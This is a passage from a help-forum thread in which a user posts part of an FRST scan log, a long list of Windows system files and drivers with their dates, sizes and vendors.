2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\netmsg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\neth.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3r.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msprivs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-WindowsPhone-SEManagementProvider.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\lltdres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iologmsg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmdskres2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAppsRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bridgeres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\asferror.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32res.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00002426 _____ C:\WINDOWS\system32\WsmTxt.xsl
2016-12-03 08:34 - 2016-12-03 08:34 - 00002307 _____ C:\WINDOWS\system32\WimBootCompress.ini
2016-12-03 08:34 - 2016-12-03 08:34 - 00002219 ___RS C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk
2016-12-03 08:34 - 2016-12-03 08:34 - 00002199 ___RS C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk
2016-12-03 08:34 - 2016-12-03 08:34 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrsmgr.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00001820 _____ C:\WINDOWS\system32\rasctrnm.h
2016-12-03 08:34 - 2016-12-03 08:34 - 00001688 _____ C:\WINDOWS\system32\TransformPPSToWlanCredentials.xslt
2016-12-03 08:34 - 2016-12-03 08:34 - 00001673 _____ C:\WINDOWS\system32\tcpbidi.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00001559 _____ C:\WINDOWS\system32\WsmPty.xsl
2016-12-03 08:34 - 2016-12-03 08:34 - 00000843 _____ C:\WINDOWS\system32\onlinesetup.cmd
2016-12-03 08:34 - 2016-12-03 08:34 - 00000760 _____ C:\WINDOWS\system32\@edptoastimage.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000726 _____ C:\WINDOWS\system32\wpr.config.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00000714 _____ C:\WINDOWS\system32\RestartManager.mof
2016-12-03 08:34 - 2016-12-03 08:34 - 00000714 _____ C:\WINDOWS\system32\@WindowsHelloFaceToastIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000670 ___RH C:\WINDOWS\WindowsShell.Manifest
2016-12-03 08:34 - 2016-12-03 08:34 - 00000646 _____ C:\WINDOWS\system32\Drivers\gmreadme.txt
2016-12-03 08:34 - 2016-12-03 08:34 - 00000614 _____ C:\WINDOWS\system32\WdsUnattendTemplate.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00000600 _____ C:\WINDOWS\system32\@language_notification_icon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000565 _____ C:\WINDOWS\system32\NdfEventView.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00000520 _____ C:\WINDOWS\system32\@optionalfeatures.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000450 _____ C:\WINDOWS\system32\@BackgroundAccessToastIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000404 _____ C:\WINDOWS\system32\@VpnToastIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000352 _____ C:\WINDOWS\system32\@WwanSimLockIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000330 _____ C:\WINDOWS\system32\@EnrollmentToastIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000308 _____ C:\WINDOWS\system32\@AudioToastIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000263 _____ C:\WINDOWS\system32\odbcconf.rsp
2016-12-03 08:34 - 2016-12-03 08:34 - 00000176 _____ C:\WINDOWS\system32\RestartManagerUninstall.mof
2016-12-03 08:34 - 2016-12-03 08:34 - 00000167 _____ C:\WINDOWS\system32\removehypervisor.mof
2016-12-03 08:34 - 2016-12-03 08:34 - 00000155 _____ C:\WINDOWS\system32\@WwanNotificationIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00000150 _____ C:\WINDOWS\system32\pcl.sep
2016-12-03 08:34 - 2016-12-03 08:34 - 00000051 _____ C:\WINDOWS\system32\pscript.sep
2016-12-03 08:34 - 2016-12-03 08:34 - 00000033 _____ C:\WINDOWS\system32\winrm.cmd
2016-12-03 08:33 - 2016-12-03 10:01 - 00035088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\terminpt.sys
2016-12-03 08:33 - 2016-12-03 10:01 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdpbus.sys
2016-12-03 08:33 - 2016-12-03 10:00 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tsusbhub.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 03414800 _____ (QLogic Corporation) C:\WINDOWS\system32\Drivers\evbda.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 02099984 _____ (Chelsio Communications) C:\WINDOWS\system32\Drivers\cht4vx64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 01806672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 01131280 _____ (PMC-Sierra) C:\WINDOWS\system32\Drivers\adp80xx.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00838416 _____ (Mellanox) C:\WINDOWS\system32\Drivers\mlx4_bus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00711440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00708880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00683520 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00668944 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaStorAV.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00604160 _____ (Realtek ) C:\WINDOWS\system32\Drivers\rt640x64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00571664 _____ (LSI Corporation, Inc.) C:\WINDOWS\system32\Drivers\megasr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00558864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00537360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00529680 _____ (QLogic Corporation) C:\WINDOWS\system32\Drivers\bxvbda.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00522000 _____ (Mellanox) C:\WINDOWS\system32\Drivers\ibbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00502544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbhub.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthHFSrv.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00455440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00407824 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaStorV.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\SysFxUI.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00380688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\portcls.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00342800 _____ (Chelsio Communications) C:\WINDOWS\system32\Drivers\cht4sx64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00340240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00301328 _____ (VIA Corporation) C:\WINDOWS\system32\Drivers\VSTXRAID.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00279824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00273680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00269312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00266000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mausbhost.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00264704 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSDScDrv.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00255248 _____ (AMD Technologies Inc.) C:\WINDOWS\system32\Drivers\amdsbs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\1394ohci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpdMtp.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00208656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00187664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ataport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00185104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rfcomm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00176384 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS2i_I2C.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00173056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cdrom.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00165136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162576 _____ (VIA Technologies Inc.,Ltd) C:\WINDOWS\system32\Drivers\vsmraid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00162064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpdMtpUS.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00146192 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvraid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00133392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufxsynopsys.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00130320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00127760 _____ (PMC-Sierra, Inc.) C:\WINDOWS\system32\Drivers\arcsas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00126224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\capimg.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00119568 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sas2i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pcmcia.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\EhStorTcgDrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00113152 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSSi_I2C.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00105744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sbp2port.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00104720 _____ (Mellanox) C:\WINDOWS\system32\Drivers\ndfltr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00104720 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00103184 _____ (LSI) C:\WINDOWS\system32\Drivers\3ware.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbcir.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00101136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00099088 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\lsi_sas3i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00098576 _____ (Chelsio Communications) C:\WINDOWS\system32\Drivers\cht4dx64.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pmem.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00097552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\disk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\parport.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\drmk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00093456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UfxChipidea.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00087312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\scmbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00085776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2016-12-03 08:33 - 2016-12-03 08:33 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serial.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00083216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00081408 _____ (Intel(R) Corporation) C:\WINDOWS\system32\Drivers\iai2c.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00079120 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdsata.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00078608 _____ (LSI Corporation) C:\WINDOWS\system32\Drivers\lsi_sss.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00077584 _____ (Silicon Integrated Systems) C:\WINDOWS\system32\Drivers\sisraid4.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00075536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgr.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00074000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\uaspstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00069904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthmodem.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00064512 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS2i_GPIO2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Synth3dVsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060688 _____ (Mellanox) C:\WINDOWS\system32\Drivers\winverbs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060176 _____ (Hewlett-Packard Company) C:\WINDOWS\system32\Drivers\HpSAMD.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00060176 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00059664 _____ (Marvell Semiconductor, Inc.) C:\WINDOWS\system32\Drivers\mvumis.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00058640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00057616 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\percsas3i.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\umbus.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicDisplay.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00056080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00055568 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\megasas.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00054544 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\percsas2i.sys

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #33 on: January 25, 2017, 08:59:28 PM »
19th continuation of FRST

2016-12-03 08:33 - 2016-12-03 08:33 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidi2c.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00049424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vdrvroot.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00048912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciidex.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\circlass.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidir.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msgpiowin32.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mausbip.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidinterrupt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dmvsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\devauthe.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00044352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthAvrcpTg.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00042768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmstorfl.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsUsbGDCoInstaller.dll
2016-12-03 08:33 - 2016-12-03 08:33 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidparse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040720 _____ (Silicon Integrated Systems Corp.) C:\WINDOWS\system32\Drivers\sisraid2.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\RfxVmt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00040208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mssmbios.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\hidusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\monitor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00038400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\buttonconverter.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00038128 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSSi_GPIO.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsUpdateElevatedInstaller.exe
2016-12-03 08:33 - 2016-12-03 08:33 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\TsUsbGD.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbuhci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00033552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbatt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00033280 _____ (Intel(R) Corporation) C:\WINDOWS\system32\Drivers\iagpio.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storvsc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\battc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fdc.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthhfHid.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wacompen.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbohci.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\CmBatt.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00029456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00028432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027920 _____ (Mellanox) C:\WINDOWS\system32\Drivers\winmad.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbprint.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026896 _____ C:\WINDOWS\system32\Drivers\SDFRd.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026896 _____ (Promise Technology, Inc.) C:\WINDOWS\system32\Drivers\stexstor.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\npsvctrig.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\flpydisk.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\serenum.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\VMBusHID.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\uefi.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WSDScan.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\urschipidea.sys
2016-12-03 08:33 - 2016-12-03 08:33 - 00024336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\atapi.sys
